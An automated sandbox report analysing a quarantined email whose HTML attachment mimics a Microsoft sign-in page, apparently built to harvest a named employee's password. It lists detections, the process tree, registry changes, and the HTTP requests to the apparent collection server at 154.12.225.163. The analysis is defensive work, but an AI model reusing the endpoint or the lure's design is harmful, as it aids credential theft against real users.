
Windows Analysis Report
Quarantined Messages(11).zip

Overview

General Information

Sample name: Quarantined Messages(11).zip
Analysis ID: 1530598
MD5: 03430da0f93aa351348a314954c0a8f2
SHA1: 34acfc8fb8eafbfa475cee8ef8c47698a53243f0
SHA256: d76ddc960eb2350fda3b6921c19d40b1ae5e6f3a4cb2433dfdea3f10f03461e2

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 6720 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 5152 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(11).zip\ca56da36-71ea-4ec2-9820-08dce887adf9\1c99d929-e95f-2462-0a44-8852be668566.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6688 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8629CF2E-5B64-48E8-ADE3-CF97CDFF8DD7" "A79F8F49-6F5B-42C1-B65C-05AFF02BDB33" "5152" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 3364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1944,i,7005086442058721016,18223057916398399266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Source | Rule | Description | Author | Strings
0.1.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
0.2.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
      Source: Registry Key set | Author: frack113 | Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
      No Suricata rule has matched


      Phishing

      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | LLM: Score: 10; Reasons: HTML file with login form; DOM: 0.2.pages.csv
      Source: Yara match | File source: 0.1.pages.csv, type: HTML
      Source: Yara match | File source: 0.2.pages.csv, type: HTML
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: Title: Sign in to your account does not match URL
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | HTTP Parser: No <meta name="copyright".. found
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | TCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: global traffic | HTTP traffic detected:
        GET /7353914071/next.php HTTP/1.1
        Host: 154.12.225.163
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
      Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
      Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
      Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global traffic | DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global traffic | DNS traffic detected: DNS query: 7353914071-1323985617.cos.sa-saopaulo.myqcloud.com
      Source: global traffic | DNS traffic detected: DNS query: www.google.com
      Source: global traffic | DNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknown | HTTP traffic detected:
        POST /7353914071/next.php HTTP/1.1
        Host: 154.12.225.163
        Connection: keep-alive
        Content-Length: 13
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Origin: null
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Data Raw: 64 6f 3d 75 73 65 72 2d 63 68 65 63 6b
        Data Ascii: do=user-check
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65368, 65369, 65370, 65371, 65372, 65373, 65374, 65375, 65376, 65379, 65380, 65383, 65384, 65385, 65387, 65388, 65389, 65393
      Source: unknown | Network traffic detected: HTTP traffic on ports 65368, 65369, 65370, 65371, 65372, 65373, 65374, 65375, 65376, 65379, 65380, 65383, 65384, 65385, 65387, 65388, 65389, 65393 -> 443
      Source: classification engine | Classification label: mal56.phis.winZIP@18/38@8/151
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241010T0328520416-5152.etl
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(11).zip\ca56da36-71ea-4ec2-9820-08dce887adf9\1c99d929-e95f-2462-0a44-8852be668566.eml"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8629CF2E-5B64-48E8-ADE3-CF97CDFF8DD7" "A79F8F49-6F5B-42C1-B65C-05AFF02BDB33" "5152" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1944,i,7005086442058721016,18223057916398399266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: c2r64.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: msasn1.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: rsaenh.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: gpapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information queried: ProcessInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      MITRE ATT&CK matrix (techniques listed per tactic; a leading number is the count shown in the report's matrix cell for that technique):

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
      Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
      Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
      Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook
      Defense Evasion: 1 Masquerading; 1 Rundll32; 1 Process Injection; 1 DLL Side-Loading
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
      Discovery: 1 Process Discovery; 1 File and Directory Discovery; 14 System Information Discovery; System Network Configuration Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
      Command and Control: 2 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; 1 Ingress Tool Transfer
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

      No Antivirus matches
      Source | Detection | Scanner
      206.23.85.13.in-addr.arpa | 1% | Virustotal
      stackpath.bootstrapcdn.com | 0% | Virustotal
      cdnjs.cloudflare.com | 0% | Virustotal
      aadcdn.msftauth.net | 0% | Virustotal
      www.google.com | 0% | Virustotal
      sni1gl.wpc.omegacdn.net | 0% | Virustotal
      code.jquery.com | 1% | Virustotal
      maxcdn.bootstrapcdn.com | 0% | Virustotal
      cos.sa-saopaulo.myqcloud.com | 0% | Virustotal
      s-part-0036.t-0009.t-msedge.net | 0% | Virustotal
      Source | Detection | Scanner
      http://154.12.225.163/7353914071/next.php | 0% | Virustotal
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      stackpath.bootstrapcdn.com | 104.18.10.207 | true | false | | unknown
      cos.sa-saopaulo.myqcloud.com | 43.135.205.15 | true | false | | unknown
      s-part-0044.t-0009.fb-t-msedge.net | 13.107.253.72 | true | false | | unknown
      code.jquery.com | 151.101.194.137 | true | false | | unknown
      cdnjs.cloudflare.com | 104.17.25.14 | true | false | | unknown
      s-part-0036.t-0009.t-msedge.net | 13.107.246.64 | true | false | | unknown
      maxcdn.bootstrapcdn.com | 104.18.11.207 | true | false | | unknown
      sni1gl.wpc.omegacdn.net | 152.199.21.175 | true | false | | unknown
      s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
      www.google.com | 142.250.186.68 | true | false | | unknown
      7353914071-1323985617.cos.sa-saopaulo.myqcloud.com | unknown | unknown | false | | unknown
      aadcdn.msftauth.net | unknown | unknown | false | | unknown
      206.23.85.13.in-addr.arpa | unknown | unknown | false | | unknown
      Name | Malicious | Antivirus Detection | Reputation
      file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html | true | | unknown
      http://154.12.225.163/7353914071/next.php | false | | unknown
      IP | Domain | Country | ASN | ASN Name | Malicious
      52.113.194.132 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      142.250.186.68 | www.google.com | United States | 15169 | GOOGLEUS | false
      13.107.246.64 | s-part-0036.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      142.250.185.67 | unknown | United States | 15169 | GOOGLEUS | false
      172.217.16.202 | unknown | United States | 15169 | GOOGLEUS | false
      104.18.10.207 | stackpath.bootstrapcdn.com | United States | 13335 | CLOUDFLARENETUS | false
      52.109.68.130 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      154.12.225.163 | unknown | United States | 174 | COGENT-174US | false
      172.217.18.3 | unknown | United States | 15169 | GOOGLEUS | false
      104.18.11.207 | maxcdn.bootstrapcdn.com | United States | 13335 | CLOUDFLARENETUS | false
      43.135.205.15 | cos.sa-saopaulo.myqcloud.com | Japan | 4249 | LILLY-ASUS | false
      2.19.126.151 | unknown | European Union | 16625 | AKAMAI-ASUS | false
      239.255.255.250 | unknown | Reserved | unknown | unknown | false
      52.109.28.46 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      152.199.21.175 | sni1gl.wpc.omegacdn.net | United States | 15133 | EDGECASTUS | false
      20.42.73.24 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      151.101.194.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
      142.250.184.206 | unknown | United States | 15169 | GOOGLEUS | false
      52.109.76.243 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
      66.102.1.84 | unknown | United States | 15169 | GOOGLEUS | false
              IP
              192.168.2.16
              192.168.2.23
      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1530598
      Start date and time: 2024-10-10 09:27:31 +02:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: defaultwindowsinteractivecookbook.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of new started processes analysed: 18
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • EGA enabled
      Analysis Mode: stream
      Analysis stop reason: Timeout
      Sample name: Quarantined Messages(11).zip
      Detection: MAL
      Classification: mal56.phis.winZIP@18/38@8/151
      Cookbook Comments:
      • Found application associated with file extension: .zip
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 23.60.203.209
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
      • Not all processes were analyzed; the report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetValueKey calls found.
      • VT rate limit hit for: s-part-0017.t-0009.fb-t-msedge.net
      Input | Output
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
              "brand":["Microsoft"],
              "contains_trigger_text":false,
              "trigger_text":"",
              "prominent_button_name":"Sign in options",
              "text_input_field_labels":"unknown",
              "pdf_icon_visible":false,
              "has_visible_captcha":false,
              "has_urgent_text":false,
              "text":"Microsoft Taking you to your Organization's sign-in page ... cancel Sign in options",
              "has_visible_qrcode":false}
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
              "brand":["Microsoft"],
              "contains_trigger_text":false,
              "trigger_text":"",
              "prominent_button_name":"Sign in",
              "text_input_field_labels":["Enter password",
              "Forget password?"],
              "pdf_icon_visible":false,
              "has_visible_captcha":false,
              "has_urgent_text":false,
              "text":"Microsoft riccardo.nobile@beantech.it Enter password Forget password? Sign in",
              "has_visible_qrcode":false}
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
              "brand":["Microsoft"],
              "contains_trigger_text":false,
              "trigger_text":"",
              "prominent_button_name":"Sign in",
              "text_input_field_labels":["Enter password",
              "Forget password?"],
              "pdf_icon_visible":false,
              "has_visible_captcha":false,
              "has_urgent_text":false,
              "text":"riccardo.nobile@beantech.it Enter password Your account or password is incorrect. If you don't remember your password,
               reset it now Password Forget password? Sign in",
              "has_visible_qrcode":false}
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):231348
              Entropy (8bit):4.393874728771997
              Encrypted:false
              SSDEEP:
              MD5:2507692E9932661F502DCDC5EBB6A991
              SHA1:8FFD313B085253015DF4B110B66EB834D4C7636E
              SHA-256:194F82DEA463CE62A56DD01FF2B5CD36DFBEE759BD4869C029955EB74C490493
              SHA-512:B78F0C81CDCF25279EC2B4A6EC10A0FB8718125539F84FA4F592FCDC2B0DE53B1F094E615A85A1DAE919F8BD199D599F5B9799029223AC06421B8157266D649B
              Malicious:false
              Reputation:unknown
              Preview:TH02...... ...Q.........SM01X...,.....E.............IPM.Activity...........h...............h............H..h\.S.....=......h............H..h\cal ...pDat...h .y.0.....S....hu.|............h........_`Mk...h).|.@...I.lw...h....H...8.Rk...0....T...............d.........2h...............k..D...........!h.............. h.K.9.....S...#h....8.........$h........8....."h.%}......%}...'h..............1hu.|.<.........0h....4....Rk../h....h.....RkH..h....p...\.S...-h .........S...+h.|.....P.S................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):322260
              Entropy (8bit):4.000299760592446
              Encrypted:false
              SSDEEP:
              MD5:CC90D669144261B198DEAD45AA266572
              SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
              SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
              SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
              Malicious:false
              Reputation:unknown
              Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):10
              Entropy (8bit):2.9219280948873623
              Encrypted:false
              SSDEEP:
              MD5:BF57E7081A663349894DA833BF1A6EB8
              SHA1:9C30D29E0CD716B4F33F46A46CBEC7C6E63AEA2B
              SHA-256:2C67DA102EF5E8E6D53F6A8EB0561BA609B38A60DDB7C8DEECE5BDEB2899AC19
              SHA-512:5A637180783E51BE796669BA92BF45C6AC0B645125C402C07147D2528636F4748059211050240E88E7346516ED5C79CE86756DCCB45073522BC60704C75482B3
              Malicious:false
              Reputation:unknown
              Preview:1728545336
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):177810
              Entropy (8bit):5.2872168991195165
              Encrypted:false
              SSDEEP:
              MD5:C88D686C0A6A061D8C13787FF858C31D
              SHA1:BD44BDEF2694A4A22DFF9D00BA0DBE9F0AFA8D09
              SHA-256:6F3BD0428C1C29DEC9E026E0820B8FE74E208D7D566F3C4ED2FC123375699579
              SHA-512:28C9B2644E1139DE334D374D7D88A39A063C981357B6F5F43AFB451074FC4B253DCA4997D277D4100EA008513FF935582DCD6A85AC48FE67EC0E9F475EE013B8
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-10T07:28:54">.. Build: 16.0.18124.40132-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):0.09304735440217722
              Encrypted:false
              SSDEEP:
              MD5:D0DE7DB24F7B0C0FE636B34E253F1562
              SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
              SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
              SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite Rollback Journal
              Category:dropped
              Size (bytes):4616
              Entropy (8bit):0.13784977103055013
              Encrypted:false
              SSDEEP:
              MD5:7433ACC442F5D78A3F1179BBD037E011
